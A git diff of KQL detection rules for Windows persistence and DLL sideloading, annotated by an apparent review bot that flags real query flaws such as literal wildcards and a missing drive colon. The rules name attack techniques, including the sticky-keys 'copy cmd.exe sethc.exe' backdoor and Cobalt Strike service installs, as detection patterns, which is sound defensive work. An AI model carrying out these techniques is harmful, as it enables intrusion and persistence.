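Review bot: `SCRNSAVE.EXE` is a value name under `Control Panel\Desktop`, so `RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE"` will not match DeviceRegistryEvents, where the value name lives in RegistryValueName. Suggest `| where RegistryKey endswith "\\Control Panel\\Desktop" and RegistryValueName =~ "SCRNSAVE.EXE" and not (InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe")`. The rundll32.exe exclusion is broad for a persistence rule, since rundll32 is itself a common LOLBin; anchoring it to `C:\\Windows\\System32\\rundll32.exe` would keep the false-positive benefit without excusing a renamed or relocated copy.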
@@ -1,15 +1,15 @@
-// Title: Persistence Via Disk Cleanup Handler - Autorun
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: medium
-// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
-// The disk cleanup manager is part of the operating system.
-// It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
-// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
-// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
-// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-
-DeviceRegistryEvents
+// Title: Persistence Via Disk Cleanup Handler - Autorun
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
+// The disk cleanup manager is part of the operating system.
+// It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
+// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
+// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
+// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Autorun") or ((RegistryValueData contains "cmd" or RegistryValueData contains "powershell" or RegistryValueData contains "rundll32" or RegistryValueData contains "mshta" or RegistryValueData contains "cscript" or RegistryValueData contains "wscript" or RegistryValueData contains "wsl" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Windows\\TEMP\\" or RegistryValueData contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") and (RegistryKey contains "\\CleanupString" or RegistryKey contains "\\PreCleanupString")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql b/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql
index f18dc1a9..5aadd689 100644
--- a/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql
+++ b/KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql
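Review bot: The outer `RegistryKey endswith "...\\Explorer\\VolumeCaches*"` guard can never be true because KQL `endswith` compares the `*` literally, so neither branch of this rule fires; the branches themselves also lean on Sysmon conventions (`Autorun`, `CleanupString` and `PreCleanupString` are value names, and `"DWORD (0x00000001)"` is Sysmon's rendering of a DWORD) that DeviceRegistryEvents does not follow, since it keeps the value name in RegistryValueName and records DWORD data as the bare number — confirm the latter on your tenant. I would restructure the predicate around the key prefix plus RegistryValueName, as below, keeping the existing list of suspicious RegistryValueData fragments unchanged.

```kql
DeviceRegistryEvents
| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches\\"
| where (RegistryValueName =~ "Autorun" and RegistryValueData =~ "1")
    or (RegistryValueName in~ ("CleanupString", "PreCleanupString")
        // … unchanged: the RegistryValueData contains "cmd" / "powershell" / … / "\\Startup\\" list …
        and (RegistryValueData contains "cmd" or RegistryValueData contains "powershell"))
```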
@@ -1,12 +1,12 @@
-// Title: Persistence Via Hhctrl.ocx
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Persistence Via Hhctrl.ocx
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32\\(Default)" and (not(RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/persistence_via_new_sip_provider.kql b/KQL/rules/Persistence/persistence_via_new_sip_provider.kql
index 84398537..9d4e9561 100644
--- a/KQL/rules/Persistence/persistence_via_new_sip_provider.kql
+++ b/KQL/rules/Persistence/persistence_via_new_sip_provider.kql
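Review bot: The `\\InprocServer32\\(Default)` suffix is Sysmon's rendering of a key's default value, not something DeviceRegistryEvents puts in RegistryKey, so this rule is unlikely to fire as converted. Suggest matching the key and the default value name separately: `| where RegistryKey contains "\\CLSID\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\InprocServer32" and isempty(RegistryValueName) and not (RegistryValueData =~ "C:\\Windows\\System32\\hhctrl.ocx")` — check how your tenant represents the default value name (empty versus a placeholder string) before relying on `isempty`. The exclusion is a single exact path, so the legitimate SysWOW64 copy of hhctrl.ocx would alert; if that is intended as an indicator, a comment saying so would prevent a future "fix".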
@@ -1,12 +1,12 @@
-// Title: Persistence Via New SIP Provider
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: medium
-// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003
-// False Positives:
-// - Legitimate SIP being registered by the OS or different software.
-
-DeviceRegistryEvents
+// Title: Persistence Via New SIP Provider
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1553.003
+// False Positives:
+// - Legitimate SIP being registered by the OS or different software.
+
+DeviceRegistryEvents
 | where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers*" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql
index 17e4ebb7..589ba46e 100644
--- a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql
+++ b/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql
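Review bot: `RegistryKey contains "\\Dll"` / `"\\$DLL"` and the two `RegistryKey endswith "...\\Providers*"` terms are Sysmon-shaped: `Dll` and `$DLL` are value names, which DeviceRegistryEvents keeps in RegistryValueName, and the trailing `*` is a literal in KQL `endswith`, so the `Providers` branches never match while the `\\Dll` fragment would also hit any key path containing that substring. The rewrite below moves the value-name test to RegistryValueName and turns the wildcard suffixes into `contains` on the key prefix; the existing `WINTRUST.DLL`/`mso.dll`/PsfSip exclusions are unchanged. Note the bare-filename exclusion means a full path such as `C:\\Windows\\System32\\WINTRUST.DLL` still alerts — likely intended, but a comment would make that explicit.

```kql
DeviceRegistryEvents
| where RegistryValueName in~ ("Dll", "$DLL")
    and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\"
      or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType"
      or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\"
      or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")
// … unchanged: the not(...) block excluding WINTRUST.DLL / mso.dll and the poqexec.exe PsfSip.dll case …
```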
@@ -1,13 +1,13 @@
-// Title: Persistence Via Sticky Key Backdoor
-// Author: Sreeman
-// Date: 2020-02-18
-// Level: critical
-// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
-// When the sticky keys are "activated" the privilleged shell is launched.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Persistence Via Sticky Key Backdoor
+// Author: Sreeman
+// Date: 2020-02-18
+// Level: critical
+// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
+// When the sticky keys are "activated" the privilleged shell is launched.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1546.008, attack.privilege-escalation
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql b/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql
index 84f7d7e0..fc9bf38d 100644
--- a/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql
+++ b/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql
@@ -1,10 +1,10 @@
-// Title: Persistence Via TypedPaths - CommandLine
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-22
-// Level: medium
-// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-
-DeviceProcessEvents
+// Title: Persistence Via TypedPaths - CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: medium
+// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql b/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql
index 8b970fc6..0035caee 100644
--- a/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql
+++ b/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql
@@ -1,10 +1,10 @@
-// Title: Possible Privilege Escalation via Weak Service Permissions
-// Author: Teymur Kheirkhabarov
-// Date: 2019-10-26
-// Level: high
-// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
-
-DeviceProcessEvents
+// Title: Possible Privilege Escalation via Weak Service Permissions
+// Author: Teymur Kheirkhabarov
+// Date: 2019-10-26
+// Level: high
+// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\sc.exe" and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192"))) and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql b/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql
index 0775aeb7..899523fe 100644
--- a/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential appverifUI.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-20
-// Level: high
-// Description: Detects potential DLL sideloading of "appverifUI.dll"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Potential appverifUI.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: high
+// Description: Detects potential DLL sideloading of "appverifUI.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql b/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql
index 67190992..ac2e714e 100644
--- a/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql
@@ -1,10 +1,10 @@
-// Title: Potential AVKkid.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-08-03
-// Level: medium
-// Description: Detects potential DLL sideloading of "AVKkid.dll"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Potential AVKkid.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "AVKkid.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql
index ee688555..e1f42f90 100644
--- a/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql
+++ b/KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql
@@ -1,13 +1,13 @@
-// Title: Potential Azure Browser SSO Abuse
-// Author: Den Iuzvyk
-// Date: 2020-07-15
-// Level: low
-// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
-// An attacker can use this to authenticate to Azure AD in a browser as that user.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity
-
-DeviceImageLoadEvents
+// Title: Potential Azure Browser SSO Abuse
+// Author: Den Iuzvyk
+// Date: 2020-07-15
+// Level: low
+// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
+// An attacker can use this to authenticate to Azure AD in a browser as that user.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives are expected since this rules is only looking for the DLL load event. 
This rule is better used in correlation with related activity
+
+DeviceImageLoadEvents
 | where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql b/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql
index 91e07edd..0b8e07fa 100644
--- a/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql
+++ b/KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql
@@ -1,12 +1,12 @@
-// Title: Potential Binary Or Script Dropper Via PowerShell
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-17
-// Level: medium
-// Description: Detects PowerShell creating a binary executable or a script file.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
-
-DeviceFileEvents
+// Title: Potential Binary Or Script Dropper Via PowerShell
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-17
+// Level: medium
+// Description: Detects PowerShell creating a binary executable or a script file.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
+
+DeviceFileEvents
 | where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not(((FolderPath endswith "\\Microsoft.PackageManagement.NuGetProvider.dll" and FolderPath startswith "C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\") or ((FolderPath endswith ".dll" or FolderPath endswith ".exe") and (FolderPath startswith "C:\\Windows\\Temp\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\")) or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and 
FolderPath endswith ".dll" and FolderPath startswith "C:\\Users\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql
index d8fcf124..6a2951a5 100644
--- a/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql
+++ b/KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql
@@ -1,12 +1,12 @@
-// Title: Potential CobaltStrike Service Installations - Registry
-// Author: Wojciech Lesicki
-// Date: 2021-06-29
-// Level: high
-// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Potential CobaltStrike Service Installations - Registry
+// Author: Wojciech Lesicki
+// Date: 2021-06-29
+// Level: high
+// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.lateral-movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql b/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql
index 48b94c8c..f6502254 100644
--- a/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_eacore_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential EACore.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-08-03
-// Level: high
-// Description: Detects potential DLL sideloading of "EACore.dll"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Potential EACore.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: high
+// Description: Detects potential DLL sideloading of "EACore.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql b/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql
index 13ffbca1..4b0af827 100644
--- a/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_edputil_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential Edputil.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-06-09
-// Level: high
-// Description: Detects potential DLL sideloading of "edputil.dll"
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Potential Edputil.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-09
+// Level: high
+// Description: Detects potential DLL sideloading of "edputil.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql b/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql
index bc09ff85..02fc4958 100644
--- a/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql
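Review bot: The third exclusion in the edputil filter, `FolderPath startswith "C\\Windows\\WinSxS\\"`, is missing the drive colon, so loads of edputil.dll from the WinSxS store are never excluded and this high-level rule will fire on legitimate side-by-side loads. It should read `FolderPath startswith "C:\\Windows\\WinSxS\\"`, matching the two sibling System32/SysWOW64 prefixes on the same line (the appverifUI rule earlier on this page spells the same prefix correctly). The defect sits on an unchanged context line of a whitespace-only hunk, so it looks inherited from the source rule or the converter rather than introduced here; if the .kql files are generated, the fix belongs upstream of the output.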
@@ -1,13 +1,13 @@
-// Title: Potential Goopdate.DLL Sideloading
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-15
-// Level: medium
-// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.
-// - Other third party chromium browsers located in AppData
-
-DeviceImageLoadEvents
+// Title: Potential Goopdate.DLL Sideloading
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly. 
+// - Other third party chromium browsers located in AppData
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not((((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox")) or ((FolderPath contains "\\AppData\\Local\\Temp\\GUM" or FolderPath contains ":\\Windows\\SystemTemp\\GUM") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" or InitiatingProcessFolderPath contains ":\\Windows\\SystemTemp\\GUM") and InitiatingProcessFolderPath endswith ".tmp\\GoogleUpdate.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql b/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql
index 73a2d0c8..e443ad8c 100644
--- a/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql
@@ -1,10 +1,10 @@
-// Title: Potential Iviewers.DLL Sideloading
-// Author: X__Junior (Nextron Systems)
-// Date: 2023-03-21
-// Level: high
-// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-
-DeviceImageLoadEvents
+// Title: Potential Iviewers.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-21
+// Level: high
+// Description: Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\iviewers.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql b/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql
index c9a9cef3..c6a92fed 100644
--- a/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql
+++ b/KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql
@@ -1,12 +1,12 @@
-// Title: Potential Mfdetours.DLL Sideloading
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-03
-// Level: medium
